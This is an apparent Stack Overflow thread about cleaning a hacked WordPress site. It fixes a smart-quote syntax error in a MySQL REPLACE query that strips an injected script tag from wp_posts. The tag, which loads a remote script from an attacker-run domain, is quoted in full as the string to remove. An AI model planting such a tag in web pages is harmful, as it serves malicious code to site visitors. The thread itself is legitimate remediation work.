# Can't execute query string for unknown reason

Tags: mysql, sql, wordpress, phpmyadmin, mariadb

One of my clients has been hit by a SQL injection attack on his WordPress website. Now it's up to me to fix the mess. I barely have an understanding of SQL and PHP though so I am heavily reliant on Stackoverflow for advice. I couldn't however find the solution to my answer anywhere, including other websites.

**The problem:**
I'm trying to replace a string of text within a table column with nothing. I try to execute the following query however, it marks an error on the question mark. For some reason it counts it as a parameter and I do not understand why..

```
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascript’></script>”, ””));
```

Error message:

```
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascri' at line 1
```

Could someone please advice me on how to fix the command or how to otherwise clean up the wordpress database from these scripts?

Thank you very much in advance!

Comment: In the code above, it looks like you are using smart-quote symbols `”` and `’`. You must use ASCII quote symbols `"` and `'` when writing SQL (the same is true of most programming languages). I'm not sure if that is the cause of your issue, but it's an FYI.

Comment: Okay I tested it in my system. I do get an error when I try your SQL statement with the smart-quotes, and it is fixed if I change them to ASCII quote symbols.

Comment: I edited the body of your question to show the error message I get when I try this. Does that look like the error you got? TIP: When asking a question on Stack Overflow about an error, please include the _exact_ error message.

Comment: Just checking: is your intention to replace the value in this column for every record in your table? If not, I would definitely recommend using a WHERE clause to restrict which rows are going to be updated to those that you explicitly want to be updated

Comment: Hi Bill & Nick, thanks for your replies! When I tried it with ASCII quotes it threw an error because of the quotes within the string itself. Now when I try it with ASCII double quotes, I get no errors. Even though I tried it before.

@Nick; my intention is to only remove the string from the entire database, without affecting the rows they're placed in. What query would you recommend in that case? Just replace the "UPDATE" part with "WHERE"?

Comment: I would always explicitly define which rows I wanted to update (just to be sure I didn't accidentally update a row incorrectly) - so I would add WHERE post_content = "<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascript’></script>"

Comment: I disagree with @NickW slightly; using REPLACE() to strip the string is fine. Nick's concern would be if you were simply erasing the entirety of the field, but you aren't. You're selectively extricating it, and Nick's solution would skip areas where the content included other things. Keep doing what you got, Glenn; REPLACE was the correct solution.

Comment: Thanks guys, it seems REPLACE indeed worked. WHERE even threw an error. The database is clean and now it's time to clean the files of any malware. Thanks again for your help!